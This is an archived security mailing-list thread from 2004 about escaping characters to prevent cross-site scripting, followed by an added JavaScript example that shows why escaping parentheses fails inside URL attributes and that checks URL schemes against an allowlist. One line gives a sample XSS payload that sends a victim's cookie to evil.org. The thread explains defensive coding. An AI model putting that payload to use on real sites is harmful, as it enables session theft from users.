WebApp Sec mailing list archives
RE: AppSec FAQ at OWASP
From: "Sangita Pakala" <sangita.pakala () paladion net>
Date: Thu, 29 Jan 2004 15:10:35 +0530
Thank you Ulf for the nice words. To address your question:
Why is it important to escape "(", ")" and "#"?
We need to escape these characters to take care of CSS that does not rely on <script> tags. For instance, the "javascript:" construct could be used to embed scripts without using the <script> tag. In the example below, let's say that the user's input is reflected as the value for <img src= >. Now, when the img src= line is encountered, the window.open javascript function is called and the cookie sent to evil.org:

<img src= "Javascript:window.open('http://www.evil.org?cookie='+document.cookie)">

Escaping the "(" and ")" above renders the function call moot. If someone can point me to a good example for when escaping "#" is required, I'd love to hear that.

Gunter Ollmann has an excellent article on CSS and special characters at http://www.technicalinfo.net/papers/CSS.html

Regards,
Sangita.

Sangita Pakala
Paladion Networks
http://www.paladion.net

-----Original Message-----
From: Ulf Härnhammar [mailto:Ulf.Harnhammar.9485 () student uu se]
Sent: Wednesday, January 28, 2004 9:56 PM
To: Sangita Pakala
Cc: webappsec () securityfocus com
Subject: Re: AppSec FAQ at OWASP

Nice document! Good work!
XSS can be prevented while coding the application. You should be validating all input and output to and from the application and escape all special characters that may be used in a script. If the code replaces the special characters by the following before displaying the output, XSS can be prevented.

( ( ) ) # #

Why is it important to escape "(", ")" and "#"?

--
Ulf Härnhammar
student, Uppsala universitet
editor, idiosynkratisk ( http://labben.abm.uu.se/~ulha9485/idiosynkratisk/ )
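An added example (editor's code, not from the thread or the OWASP FAQ) for the escaping discussed in the message above. It assumes the FAQ's replacements were HTML numeric character references (&#40; &#41; &#35;; the archive has rendered them back into plain characters) and runs under Node.js. It shows the check a practitioner needs in this context: an HTML parser decodes character references inside an attribute value before that value reaches the URL parser, so in an img src (or href) the escaped parentheses come straight back and the javascript: URL is intact. What protects a URL-valued attribute is an allowlist on the resolved scheme, with attribute encoding applied afterwards. The base URL https://example.invalid/ and the function names are assumptions.

```javascript
// Added example (editor's, not from the thread). Assumes the FAQ's replacements
// were numeric character references (&#40; &#41; &#35;). Node.js, WHATWG URL class.

// The payload quoted in the message above.
const PAYLOAD =
  "Javascript:window.open('http://www.evil.org?cookie='+document.cookie)";

// 1. The FAQ's approach as quoted: replace only "(", ")" and "#" (assumed entities).
function faqEscape(s) {
  return s.replace(/[()#]/g, (c) => `&#${c.charCodeAt(0)};`);
}

// 2. What an HTML parser does with an attribute value: character references are
//    decoded before the value is handed to the URL machinery. Minimal decoder for
//    decimal, hex and a few named references (real parsers know far more names).
const NAMED = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'" };
function decodeCharRefs(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (m, body) => {
    if (body[0] === "#") {
      const cp = body[1].toLowerCase() === "x"
        ? parseInt(body.slice(2), 16)
        : parseInt(body.slice(1), 10);
      return cp > 0x10ffff ? m : String.fromCodePoint(cp);
    }
    return NAMED[body.toLowerCase()] ?? m;
  });
}

// 3. Full attribute encoding: every character that can close the value or start a
//    reference becomes a reference, so user text can never alter attribute parsing.
//    This keeps the value in the attribute; it says nothing about what the URL does.
function attrEncode(s) {
  return s.replace(/[&<>"'()#]/g, (c) => `&#${c.charCodeAt(0)};`);
}

// 4. The check the URL context actually needs: an allowlist on the *resolved* scheme.
//    WHATWG URL parsing strips tabs/newlines and surrounding whitespace and
//    lowercases the scheme, so "Java\tscript:" and " JAVASCRIPT:" are caught too.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);
const BASE = "https://example.invalid/"; // assumed site origin for relative URLs
function isAllowedUrl(input) {
  let url;
  try {
    url = new URL(input, BASE);
  } catch {
    return false; // unparseable input never reaches an attribute
  }
  return ALLOWED_SCHEMES.has(url.protocol);
}

// 5. Putting it together: reject by scheme first, then attribute-encode what remains.
function safeImgTag(userInput) {
  if (!isAllowedUrl(userInput)) return null;
  return `<img src="${attrEncode(userInput)}">`;
}

// Demonstration: the escaped parentheses return after attribute decoding,
// so the FAQ's replacement alone does not neutralise the quoted payload.
const escaped = faqEscape(PAYLOAD);
console.log(escaped);                              // ...window.open&#40;...&#41;
console.log(decodeCharRefs(escaped) === PAYLOAD);  // true: the parser undoes it
console.log(safeImgTag(PAYLOAD));                  // null: rejected by scheme
console.log(safeImgTag("/img/logo.png?v=(2)#top")); // <img src="/img/logo.png?v=&#40;2&#41;&#35;top">
```

The scheme allowlist still accepts protocol-relative values such as //other.host/x, since they resolve to the base's https: scheme; add a host check if the page must not load from other origins. The decoder is deliberately minimal; browsers also accept legacy references without a trailing semicolon, which is one more reason to validate the raw value rather than try to out-encode the parser.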
Current thread:
- AppSec FAQ at OWASP Sangita Pakala (Jan 28)
- <Possible follow-ups>
- RE: AppSec FAQ at OWASP Sangita Pakala (Jan 29)
- RE: AppSec FAQ at OWASP Ulf Härnhammar (Jan 29)
- Re: AppSec FAQ at OWASP オマル イスマイル (Jan 29)
- Re: AppSec FAQ at OWASP Laurian Gridinoc (Jan 30)